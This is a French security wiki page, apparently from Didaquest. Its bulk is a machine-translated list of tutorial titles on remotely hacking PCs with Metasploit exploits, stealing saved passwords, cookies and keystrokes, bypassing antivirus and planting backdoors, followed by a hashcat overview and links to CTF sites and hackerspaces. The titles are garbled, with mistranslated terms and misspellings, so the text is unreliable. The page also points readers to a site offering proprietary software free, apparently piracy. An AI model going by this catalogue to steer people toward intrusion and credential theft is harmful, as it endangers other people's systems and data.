Utilisation Après gratuit Hack Remote PC Windows à l'aide de type Adobe Flash Player NetConnection Confusion Hack PC à distance de Windows en utilisant la mémoire Adobe Flash Player Décompressez Via Zlib Variant Uninitialized Hack Remote PC Windows en utilisant Adobe Flash Player copie Pixels à ByteArray dépassement d'entier Hack PC à distance de Windows en utilisant Adobe Flash Player PCRE Regex Vulnérabilité Hack Remote PC Windows en utilisant Adobe Flash Player tableau d'octets avec les travailleurs après utilisation gratuite Hack Remote PC Windows en utilisant Adobe Flash Player tableau d'octets Décompressez via ZlibVariant utilisation après gratuit Hack à distance Windows, Linux, OSX PC à l'aide d'injection Firefox Proxy Prototype Privileged JavaScript Hack Remote PC Windows en utilisant Publier-It PUI Buffer Overflow (SEH) Comment trouver l'utilisation de fichiers en distance victime PC (PC à distance Forensics) Hack à distance Mot de passe Windows en utilisant Phishing Connexion Prompt Exploit Hack PC à distance de Windows en utilisant Unicode Achat SEH Buffer Overflow Hack Remote PC Windows en utilisant BulletProof FTP Client BPS Buffer Overflow Hack Remote PC Windows à l'aide i-FTP Schedule Buffer Overflow Test de pénétration du réseau en utilisant Android Phone (Tutorial Zanti Partie 1) Hack Saved LastPass maître mot de passe dans Windows Remote, Linux, PC MAC Hack PC sous Windows à distance à l'aide de Windows piste Popup Menu Win32k NULL Pointer Dereference Hack Remote PC Windows en utilisant BadBlue Exploit Comment Rassemblez correctifs appliqués à Windows PC à distance Hack PC sous Windows à distance en utilisant l'exécution Wing FTP serveur Authenticated Commande Hack à distance Windows, Linux ou MAC PC utilisant Firefox WebIDL Privileged Javascript Injection Hack à distance Windows, Linux, MAC PC utilisant Firefox à cordes console.time Privileged JavaScript Injection Comment supprimer tous les fichiers dans le PC à distance de Windows Site Web Security Certificate Attaque sur PC à distance de Windows Best of distance Astuces PC Windows Hacking (Partie 1) Hack Caractéristiques ALL sécurité dans Windows Remote 7 PC Comment shutdown, Logoff et Hibernate PC à distance de Windows Hack WIFI Réglage du PC à distance de Windows Hack PC à distance de Windows en utilisant Ericom AccessNow serveur Buffer Overflow Comment faire pour modifier tous les fichiers d'extension dans le PC à distance (Confuse extensions de fichier Attack) Hack Windows Remote PC en utilisant Easy File Gestion de serveur Web Stack Buffer Overflow Rassemblez les cookies et l'histoire de Mozilla Firefox dans Windows à distance, Linux ou PC MAC Hack Enregistrer mot de passe dans Mozilla Firefox dans Remote PC Windows, Linux ou MAC Comment trouver ALL Excel, Office, PDF et images dans le PC à distance Comment Rassemblez entrées MUICache dans Windows PC à distance Comment Crash Course Wireshark de PC à distance en utilisant CAPWAP Dissector DoS Collecte de l'information et WLAN Géolocalisation de Remote PC Windows, Linux ou MAC Hack Remote PC Windows en utilisant Windows NT Message utilisateur Appel Win32k Kernel débordement du pool (Schlamperei) Hack PC à distance en utilisant Wireshark écoute électronique / mpeg.c Stack Buffer Overflow Hack à distance Victim PC avec le document MS Office Définir nouveau mot de passe de la victime PC Remotely Hack Remote PC Windows en utilisant WinRAR Nom du fichier Spoofing Comment Rassemblez Skype Logs, Firefox Histoire et histoire Chrome de distance Victim PC Pompem - outil pour trouver des Exploits dans la base de données Major Bypass UAC Protection de Remote PC Windows dans la mémoire Injection Hack PC à distance de Windows en utilisant ALLPlayer M3U Buffer Overflow Hack Internet Explorer dans le PC à distance réglé votre page d'accueil souhaitée Hack PC à distance de Windows en utilisant totale Video Player 1.3.1 Buffer Overflow Comment faire pour supprimer les mots de passe / Cookies / Histoire / Temp Internet File d'Internet Explorer à distance Victim PC Forensics Enquête sur les PC à distance (Partie 2) Comment verrouiller le lecteur de Windows à distance Victim PC Hack Remote PC Windows en utilisant Audiotran PLS Fichier Stack Buffer Overflow Hack PC à distance de Windows en utilisant Easy CD-DA Recorder PLS Buffer Overflow Comment faire pour effectuer un écran bleu de la mort Attaque sur distance Windows 7 PC Réduction de la taille de la partition de PC à distance de Windows Forensics Enquête sur les PC à distance (Partie 1) HackPack - Collection de scripts Hacking PwnSTAR: Pwn SofT Ap SCRIPT LazyKali -script pour Kali Linux Hack Android Phone avec Metasploit dans Kali Linux Remotely Balayez Malware / Virus dans Victim PC avec Metasploit Hack à distance de Windows 7 PC utilisant IBM Forms Viewer Unicode Buffer Overflow Hack PC distant à l'aide de Real Networks RealPlayer Version Attribut Buffer Overflow Hack PC distant à l'aide d'Adobe Reader ToolButton Utilisation Après gratuit Comment Diffusion vidéo YouTube dans le système à distance de Windows Hack PC à distance avec Windows EPATHOBJ :: pprFlattenRec Privilege Escalation Local Hacked PC à distance Avec Refroidir PDF Flux d'images Buffer Overflow Hack PC à distance en utilisant Open Office Exploit PC à distance Hacked Utiliser Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow Hack PC en réseau à l'aide MJM de base Joueur 2011 .s3m Stack Buffer Overflow Exploit PC en LAN à l'aide Ombre Stream Recorder 3.0.1.7 Buffer Overflow Hack PC à distance utilisant MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow Obtenez Privilege Administrateur de la victime à distance PC sous Windows Escalation SYSTEM via KiTrap0D Hack PC à distance utilisant Beetel Connection Manager netconfig.ini Buffer Overflow Hack PC en réseau à l'aide de fichiers Thème Microsoft Windows Manipulation exécution de code arbitraire Hack Windows Remote PC utilisant Pcman FTP Server Post-Authentication STOR commande Stack Buffer Overflow Hack PC à distance de Windows Utilisation de A-PDF WAV en MP3 v1.0.0 Buffer Overflow Exploit Remote PC Windows en utilisant XMLSerializer Firefox utilisation Après gratuit Accès Kali Linux à distance sur le système Windows via Putty Hack Remote PC Windows ou Linux avec Java magasin image Array () Tableau Invalid Indexation Vulnérabilité Hack PC à distance en utilisant Intrasrv 1.0 Buffer Overflow Hack PC à distance en utilisant MiniWeb (Build 300) arbitraire File Upload Exploit PC Windows en utilisant Ultra Overflow Mini HTTPD Stack Buffer Hack PC à distance, IPhone, Android utilisant XSSF dans Metasploit Hack FTP à distance en utilisant Open-FTPD 1.2 arbitraire File Upload Hack à distance de Windows 7 PC en utilisant Chasys Draw IES Buffer Overflow Scripting Framework XSSF Cross-Site dans Metasploit (Partie 1) Bypass Antivirus et PC sous Windows Hack à distance avec Seringue Hack Remote PC Windows en utilisant Apple Quicktime 7 Invalid Atom Longueur Buffer Overflow Exploit Windows PC à distance en utilisant Corel PDF Fusion Stack Buffer Overflow Hack Windows 7 PC à distance en utilisant MediaCoder .M3U Buffer Overflow Hack Windows 7 PC à distance en utilisant ERS Viewer fichier 2013 ERS Handling Buffer Overflow Hack PC à distance de Windows en utilisant ABBS Audio Media Player .LST Buffer Overflow Hack Windows, Linux ou MAC PC utilisant Java Applet fournisseur Skeleton Insecure Invoke Méthode Hack PC Windows en utilisant Privilege Escalation local Novell Client 4.91 SP4 Exploit Windows, Linux ou MAC PC utilisant Java Applet Driver Manager toString Privileged () Exécution de code à distance Hack PC à distance à l'aide de Sun Java Web Start Double Quote Injection Comment faire pour installer Simple-Ducky Payload Générateur Voile - Un générateur Metasploit Payload Bypass Antivirus Hack Windows, Linux ou MAC PC utilisant Firefox 17.0.1 + flash code Privileged Injection Hack Windows PC distant à l'aide AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass Récupérer les données supprimées de distance Victim PC Exploit Remote PC Windows en utilisant ERS Viewer fichier 2011 ERS Handling Buffer Overflow Hack PC Windows en utilisant AudioCoder .M3U Buffer Overflow Hack à distance Windows, Linux ou MAC PC utilisant Java Applet Type de réflexion Confusion Exécution de code à distance Hack PC à distance en utilisant Free Float serveur FTP USER Commande Buffer Overflow Comment Crypter lecteur de distance Victim PC Hack PC Windows à l'aide de Java CMM à distance l'exécution de code Comment faire pour installer linux Kali guide étape par étape Hack PC Windows en utilisant la base de données Firebird Relational CNCT Groupe Nombre Buffer Overflow OWASP Xenotix XSS Exploit v3-cadre 2013 Exploit Windows, Linux ou MAC PC utilisant Java Applet JMX à distance l'exécution de code Comment Rassemblez Dump Fichiers récents de PC à distance Windows gérer User Level Payload Persistent Installer Hack netNTLM Credential utilisant Microsoft Word chemin UNC Injector Comment verrouiller / Dossier Unlock dans Victim Remote PC en utilisant Metasploit Comment faire pour obtenir l'accès administrateur du PC à distance en utilisant le noyau Windows Intel x64 SYSRET vulnérabilité Exploit Hack Remote PC Windows en utilisant VMWare OVF Outils Format Chaîne vulnérabilité Comment masquer Fichier distance Victim PC Hack à distance Mot de passe Windows en utilisant Keylogger dans Meterpreter Comment vérifier la fonction Remote Desktop activé dans le réseau avec Metasploit Hack à distance de Windows Les mots de passe en texte brut avec WCE Windows gérer la mémoire Payload Injection Attaquer sur Windows, Linux ou MAC PC utilisant Java Applet Méthode Poignée d'exécution de code à distance Hack Windows, Linux ou MAC PC utilisant Java Applet AverageRangeStatisticImpl à distance l'exécution de code Exploit PC Windows en utilisant Freesshd Authentication Bypass Hack Windows, Linux ou MAC PC utilisant Java Applet JMX à distance l'exécution de code Hack PC Windows en utilisant Orbital Viewer ORB Fichier Parsing Buffer Overflow Hack PC Windows en utilisant le nom CyberLink Power2Go attribut (P2G) Stack Buffer Overflow Exploit Hack Remote PC Windows en utilisant Real player RealMedia Gestion des fichiers Buffer Overflow Comment faire pour activer le Bureau à distance en Victim PC en utilisant Metasploit Comment hacker fichier hosts de Windows Remote 7 PC (Host Injection File) Comment Hack XAMPP de PC à distance en utilisant Metasploit Contourner Antivirus utilisant multi Pyinjector Shell Code Injection dans SET Toolkit Netdiscover - Active / Passive ARP Scanner Hack PC Windows en utilisant Neiwork FreeFloat FTP Server arbitraire de fichiers Upload Exploting Windws 7 PC en utilisant Maxthon3 sur: XCS historique Trusted Execution code Zone Comment faire pour supprimer Local compte du PC à distance en utilisant Metasploit utilisateur Comment utiliser Nmap (Tutoriel Débutant) Hack Windows 7 PC en réseau local en utilisant Blaze Video HDTV Player Pro v6.6 Nom du fichier Manipulation Vulnérabilité Comment obtenir Password Hint de distance Victim PC Hack PC à distance avec Apple QuickTime 7.7.2 texml Style Element police table Champ Stack Buffer Overflow Hack Remote PC Windows ou Linux en utilisant Java Applet JAX-WS à distance l'exécution de code De Windows Rassemblez Directory Autorisations Enumeration Comment faire pour installer BeEF dans Windows PC Best of Metasploit Meterpreter Script Best of JAVA Hacking Exploit Hack PC à distance en utilisant Orbit Downloader URL Unicode Conversion Overflow Comment Rassemblez application installée dans Victim PC Comment Rassemblez Drive USB Histoire de la victime PC Comment Rassemblez Connexion sans fil actuelle Infos du PC à distance Comment Déconnecter la connexion sans fil de PC à distance Comment faire pour trouver tous connectés réseau sans fil dans le PC à distance Comment Rassemblez de Windows Product Key de distance victime PC Comment Rassemblez Mot de passe Microsoft Outlook enregistrées dans le PC à distance Comment Hack Enregistrer mot de passe dans FileZilla du PC à distance Comment détecter Installer OS Victim BOX virtuel Best of Mozilla Firefox Hacking Exploits Test Pen pour iPhone Part 1 Comment contourner la protection de Windows Escalate UAC Hack paramètres de l'UAC dans Windows 7 en utilisant Metasploit Hack à distance Linux PC utilisant msfpayload dans BackTrack Cymothoa - injection de shellcode Runtime Backdoors Comment faire pour créer une porte dérobée dans Server en utilisant BackTrack (Tutorial Weevely) Webacoo - Web Backdoor Cookie Script-Kit Hack Remote PC Windows à l'aide Ouvrir VPN Trusted Escalation Chemin Privilège Hack Windows 7 PC en utilisant périphérique USB et SET Toolkit (Infectious Générateur médias Attack) attaque d'injection PyInjector Shellcode sur PC à distance en utilisant l'ingénierie sociale Toolkit Hack PC à distance en utilisant Microsoft Internet Explorer exec commande Utilisez-Après-Free Vulnérabilité Comment trouver OS de PC à distance (OS Footprinting) Hack PC à distance de Windows en utilisant Ratte Server Toolkit ingénierie sociale Hack à distance de Windows 7 PC en utilisant Winamp MAKI Buffer Overflow Hack Remote PC Windows ou Linux en utilisant Java 7 Applet à distance l'exécution de code Hack Windows7 PC en utilisant Powershell Vecteur d'attaque en génie Toolkit Social (Contourner Antivirus) Attaquer sur PC à distance en utilisant Adobe Flash Player 11.3 police code Parsing Exécution Hack à distance de Windows 7 PC Easy Way (Tutorial Msfvenom) Hack Remote PC Windows en utilisant Microsoft Office MS12-027 mot MSCOMCTL ActiveX Buffer Overflow Hack à distance de Windows 7 PC en utilisant SCAPE global ZIP mignon Stack Buffer Overflow BlindElephant-Web Application fingerprinter Hack à distance de Windows 7 PC à l'aide simple connexion au serveur Web Buffer Overflow Header Mutillidae (Pen-Test Web Application pratique) Hack à distance de Windows 7 PC en utilisant Microsoft XML Core Services MSXML mémoire non initialisée corruption Hack PC à distance en utilisant Java Applet Champ Bytecode Verifier Cache à distance l'exécution de code Hack Windows 7 PC avec Poison Ivy 2.3.2 C & C Serveur Buffer Overflow Hack Windows PC à distance avec Apple QuickTime texml Stack Buffer Overflow Hack PC à distance de Windows en utilisant Adobe Flash Player Type d'objet Confusion Hack PC Windows en utilisant LAN 0.6b0 Fat Lecteur Media Player Buffer Overflow Hack PC Windows en utilisant Lattice Semiconductor PAC-Designer 6.21 Symbole Valeur Buffer Overflow Hack PC à distance de Windows en utilisant TFM MMPlayer (m3u / ppl File) Buffer Overflow Hack Windows 7 en utilisant Microsoft Office Cliquez Une fois Unsafe Object Package Handling Vulnérabilité Hack PC sous Windows à distance en utilisant la vidéo LAN VLC ModPlug ReadS3M Stack Buffer Overflow Hack Remote PC XP en utilisant Microsoft Windows OLE Object File Handling Exécution de code à distance Hack Remote PC Windows en utilisant CCMplayer 1,5 m3u Playlist Stack Based Buffer Overflow Hack Remote PC Windows en utilisant Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow Hack Remote PC Windows à l'aide d'Internet Explorer COM Créer Code Objet Exécution Hack Remote PC Windows en utilisant le document Mozilla Firefox entrelacé. écrire / ajouter des enfants de corruption de mémoire Hack PC à distance de Windows en utilisant Mozilla Firefox Array.reduceRight () Integer Overflow PC Hack Windows dans LAN à l'aide d'Internet Explorer Web View Folder Icon setSlice () Dépassement Hack Remote PC Windows en utilisant Microsoft DirectShow (msvidctl.dll) MPEG-2 de corruption de mémoire Hack PC à distance en utilisant Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnérabilité Hack PC à distance en utilisant Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow Wapiti - application Web vulnérabilité scanner PC Hack de Windows dans le réseau en utilisant VLC Media Player réel texte sous-titres Overflow Hack PC à distance de Windows en utilisant MicroP 0.1.1.1600 (File MPPL) Stack Buffer Overflow Hack PC à distance de Windows en utilisant VUPlayer M3U Buffer Overflow Hack Remote PC Windows en utilisant Foxit PDF Reader 4.2 Fichier JavaScript Ecrire Exploit Hack PC Windows à distance à l'aide de fichiers ispVM système XCF Manipulation Overflow Hack PC Windows en utilisant Apple QuickTime 7.6.6 Invalid URI SMIL Buffer Overflow Hack à distance de Windows XP à l'aide de Sun Java Web Start Plugin Command Line Argument Injection Hack à distance XP PC en utilisant Adobe util.printf () Buffer Overflow Hack tout PC en réseau local en utilisant Adobe Doc.media.newPlayer Utilisation Après la vulnérabilité gratuit Hack PC en LAN à l'aide de Dépassement de Tampon de Wireshark LWRES Dissector Hack Remote PC Windows avec Astonsoft DeepBurner (Fichier DBR) Chemin Buffer Overflow web-douleur - A Scanner Web à distance pour la version Détection, Misconfiguration et Server Enumeration Hack PC Windows en utilisant Awing souple Winds3D Joueur 3,5 SceneURL Téléchargement et exécution Comment faire pour créer Backdoor en PC à distance (Tutorial metsvc) Hack Remote PC Windows en utilisant Winamp Media Player Hack PC Windows en utilisant Wireshark <= 1.4.4 paquet-dect.c Stack Buffer Overflow (à distance) Attaquer sur PC à distance si la victime utilise Wireshark w3af -Web Attaque application et de vérification (partie Tutoriel 1) Comment faire pour capturer Connexion avec java HTTP Script Keylogger dans Metaspolit Hack Windows XP en utilisant Adobe Reader U3D mémoire la vulnérabilité de corruption Hack PC Windows en utilisant Foxit Reader 3.0 Ouvrir Exécuter une action basée sur la Pile Buffer Overflow Hack Remote PC Windows en utilisant ACDSee FotoSlate PLP Fichier id Paramètre Overflow Comment attaquer sur PC à distance en utilisant le code HTTP Technique d'injection Subterfuge (Man-in-the-Middle Cadre d'attaque) Tutorial PentBox (Un outil Test de pénétration)
Trouver le lien de la page d'administration d'un site internet
Find Hidden Admin Page Of Any Website : https://www.securitynewspaper.com/2020/01/02/find-hidden-admin-page-of-any-website/
Télécharger des logiciels propriétaires, gratuitement
Ce site permet de télécharger de nombreux logiciels propriétaires, gratuitement : https://getintopc.com A utiliser avec réserve, privilégier les logiciels libres.
Reverse Engineering
Une suite d'outils de RSE (Software Reverse Engineering) développés par la Direction de la recherche de la NSA à l'appui de la mission de cybersécurité Télécharger Ghidra : https://ghidra-sre.org
Télécharger les applications Open Source mises à disposition par la NSA : https://code.nsa.gov
Shadow
Jouer en ultra sans changer de PC. Shadow permet de faire tourner tous les derniers jeux et logiciels sur un vieux PC, un Mac ou une TV. Plus besoin de racheter de matériel, il suffit de télécharger l’application. Offre payante à partir de 29,95€/mois.
Site officiel : https://shadow.tech
LAN - WAN - DMZ - Projet de Sécurité des réseaux
LAN - WAN - DMZ - Projet de Sécurité des réseaux : https://www.developpez.net/forums/d1276223/systemes/linux/securite/projet-securite-reseaux/#post11133738
Hashcat
# World's fastest and most advanced password recovery utility : hashcat
# Obtenir la description des paquets disponibles pour hashcat : sudo apt-cache search hashcat
hashcat - World's fastest and most advanced password recovery utility hashcat-data - Data files for hashcat advanced password recovery utility maskprocessor - high-performance word generator with a per-position configurable charset statsprocessor - word generator based on per-position Markov chains hashcat-nvidia - Installs hashcat and its dependencies for users with NVIDIA GPU
Exemple d'utilisation : www.darknet.org.uk/2013/11/hashtag-password-hash-type-identification-identify-hashes/
Algorithms MD4 MD5 Half MD5 (left, mid, right) SHA1 SHA-256 SHA-384 SHA-512 SHA-3 (Keccak) SipHash RipeMD160 Whirlpool GOST R 34.11-94 GOST R 34.11-2012 (Streebog) 256-bit GOST R 34.11-2012 (Streebog) 512-bit Double MD5 Double SHA1 md5($pass.$salt) md5($salt.$pass) md5(unicode($pass).$salt) md5($salt.unicode($pass)) md5(sha1($pass)) md5($salt.md5($pass)) md5($salt.$pass.$salt) md5(strtoupper(md5($pass))) sha1($pass.$salt) sha1($salt.$pass) sha1(unicode($pass).$salt) sha1($salt.unicode($pass)) sha1(md5($pass)) sha1($salt.$pass.$salt) sha256($pass.$salt) sha256($salt.$pass) sha256(unicode($pass).$salt) sha256($salt.unicode($pass)) sha512($pass.$salt) sha512($salt.$pass) sha512(unicode($pass).$salt) sha512($salt.unicode($pass)) HMAC-MD5 (key = $pass) HMAC-MD5 (key = $salt) HMAC-SHA1 (key = $pass) HMAC-SHA1 (key = $salt) HMAC-SHA256 (key = $pass) HMAC-SHA256 (key = $salt) HMAC-SHA512 (key = $pass) HMAC-SHA512 (key = $salt) PBKDF2-HMAC-MD5 PBKDF2-HMAC-SHA1 PBKDF2-HMAC-SHA256 PBKDF2-HMAC-SHA512 MyBB phpBB3 SMF vBulletin IPB Woltlab Burning Board osCommerce xt:Commerce PrestaShop Mediawiki B type Wordpress Drupal Joomla PHPS Django (SHA-1) Django (PBKDF2-SHA256) EPiServer ColdFusion 10+ Apache MD5-APR MySQL PostgreSQL MSSQL Oracle H: Type (Oracle 7+) Oracle S: Type (Oracle 11+) Oracle T: Type (Oracle 12+) Sybase hMailServer DNSSEC (NSEC3) IKE-PSK IPMI2 RAKP iSCSI CHAP Cram MD5 MySQL Challenge-Response Authentication (SHA1) PostgreSQL Challenge-Response Authentication (MD5) SIP Digest Authentication (MD5) WPA WPA2 NetNTLMv1 NetNTLMv1 + ESS NetNTLMv2 Kerberos 5 AS-REQ Pre-Auth etype 23 Kerberos 5 TGS-REP etype 23 Netscape LDAP SHA/SSHA LM NTLM Domain Cached Credentials (DCC), MS Cache Domain Cached Credentials 2 (DCC2), MS Cache 2 MS-AzureSync PBKDF2-HMAC-SHA256 descrypt bsdicrypt md5crypt sha256crypt sha512crypt bcrypt scrypt OSX v10.4 OSX v10.5 OSX v10.6 OSX v10.7 OSX v10.8 OSX v10.9 OSX v10.10 AIX {smd5} AIX {ssha1} AIX {ssha256} AIX {ssha512} Cisco-ASA Cisco-PIX Cisco-IOS Cisco $8$ Cisco $9$ Juniper IVE Juniper Netscreen/SSG (ScreenOS) Android PIN Windows 8+ phone PIN/Password GRUB 2 CRC32 RACF Radmin2 Redmine OpenCart Citrix Netscaler SAP CODVN B (BCODE) SAP CODVN F/G (PASSCODE) SAP CODVN H (PWDSALTEDHASH) iSSHA-1 PeopleSoft PeopleSoft PS_TOKEN Skype WinZip 7-Zip RAR3-hp RAR5 AxCrypt AxCrypt in memory SHA1 PDF 1.1 1.3 (Acrobat 2 4) PDF 1.4 1.6 (Acrobat 5 8) PDF 1.7 Level 3 (Acrobat 9) PDF 1.7 Level 8 (Acrobat 10 11) MS Office <= 2003 MD5 MS Office <= 2003 SHA1 MS Office 2007 MS Office 2010 MS Office 2013 Lotus Notes/Domino 5 Lotus Notes/Domino 6 Lotus Notes/Domino 8 Bitcoin/Litecoin wallet.dat Blockchain, My Wallet 1Password, agilekeychain 1Password, cloudkeychain Lastpass Password Safe v2 Password Safe v3 Keepass 1 (AES/Twofish) and Keepass 2 (AES) eCryptfs Android FDE <= 4.3 Android FDE (Samsung DEK) TrueCrypt VeraCrypt Attack-Modes Straight * Combination Brute-force Hybrid dict + mask Hybrid mask + dict accept Rules Supported OpenCL runtimes AMD Apple Intel Mesa (Gallium) NVidia pocl Supported OpenCL device types GPU CPU APU DSP FPGA Coprocessor
Dictionnaire
Dictionnaire.
Bibliographie
Consulter le sommaire sur la sécurité : Sommaire Sécurité.
Ressources pour du pentest et la sécurité : https://ipdowned.co/School%20Project/
MontréHack : Apprentissage et partage de connaissance sur la sécurité informatique en travaillant des problèmes appliqués : https://montrehack.ca/archives.html Liste des HackerSpace français : https://wiki.hackerspaces.org/France Zataz - S'informer - Se sécuriser : https://www.zataz.com Rafale : Site officiel : http://rafale.org - Archives : https://archive.org/download/RafaleZine
Communautés de Hacker
Échanger avec les communautés White Hat, Red Hat, Grey Hat et Black Hat pour rester informé et monter en compétence.
Hackerspace de Lausanne
Fixme : www.fixme.ch
Hackerspace en Australie
wiki.hackerspaces.org/Australia
HackerSpace de Strasbourg
HackStub : hackstub.netlib.re/landpage/
Hackerspace de Suisse
panglosslabs.org/?lang=fr
Hackerspace de Russie
Neuron HackerSpace - neuronspace.ru
Autres communautés
HackBBS
Site officiel - http://hackbbs.org Le FTP de HackBBS : ftp://hackbbs.org Réseau Social HackBBS : yyy
HackerOne
HackerOne est une plate-forme de coordination des vulnérabilités et de bogues qui relie les entreprises aux chercheurs en cybersécurité. En février 2017, le réseau de HackerOne comprenait environ 100 000 hackers. Site officiel : www.hackerone.com
Macbidouille
www.macbidouille.com
Root-Me
Site officiel : www.root-me.org
Les bases du hacking
Site officiel : bases-hacking.org
Newbiecontest
Site officiel : www.newbiecontest.org
Zenk Security
Site officiel : www.zenk-security.com
La French tech
Les entreprises françaises innovent et créent le monde de demain https://www.gouvernement.fr/amazing-french-tech
Mise à disposition de CTF
Des challenges pour progresser en informatique ! https://ctftime.org/event/list/upcoming
Listes de diffusions
Debian Francophone : debian-user-french@lists.debian.org HackerSpace Russe Neuron : neuronspace.ru Hackstub : hackstub.netlib.re/landpage/ LaQuadratureDuNet Discussion : discussion@laquadrature.net LaQuadratureDuNet Graphisme : graphisme@laquadrature.net LaQuadratureDuNet Juridique : juridique@laquadrature.net
Wiki et Hackerspace
Hackstub wiki : hackstub.netlib.re/wiki/index.php?title=Accueil
Kitploit
www.kitploit.com
Magazines
Actualité hacking, sécurité, vie privée : www.zataz.com Undernews : www.undernews.fr/theme/hacking-hacktivisme
Devenir un Hacker : www.secuser.com/dossiers/devenir_hacker.htm
NAVIGATION
PARTICIPER ET PARTAGERBienvenue sur le wiki de DIDAQUEST. De nombreuses pages sont partagées sur ce wiki. Créer un compte utilisateur pour participer sur ce wiki. Les pages présentées sur le wiki évoluent tous les jours. Certaines recherches sont peu abouties et incluent des erreurs. Utiliser la recherche interne de ce wiki pour trouver votre contenu. La page de discussion de Didaquest vous permet de poser une question. Utiliser la recherche interne du site pour chercher dans tout le contenu. Ce contenu ne doit pas servir à nuire à autrui ou à un système informatique. Protéger votre système Linux ou Windows en lisant la page dédié à la sécurité. Améliorer le contenu des pages avec vos propositions depuis l'onglet discussion. |
SOUTENIR CE WIKISoutenir le wiki avec un don en EDUTOKEN ou avec une autre monnaie numérique : AEON - Bitcoins - Bitcoins Cash - Bitcoins Gold - Bitcore - Blackcoins - Basic Attention Token - Bytecoins - Clams - Dash - Monero - Dogecoins - Ğ1 - Ethereum - Ethereum Classique - Litecoins - Potcoins - Solarcoins - Zcash OBTENIR DE LA MONNAIE NUMERIQUEObtenir gratuitement de la monnaie numérique : Gagner des Altcoins - Miner des Altcoins. |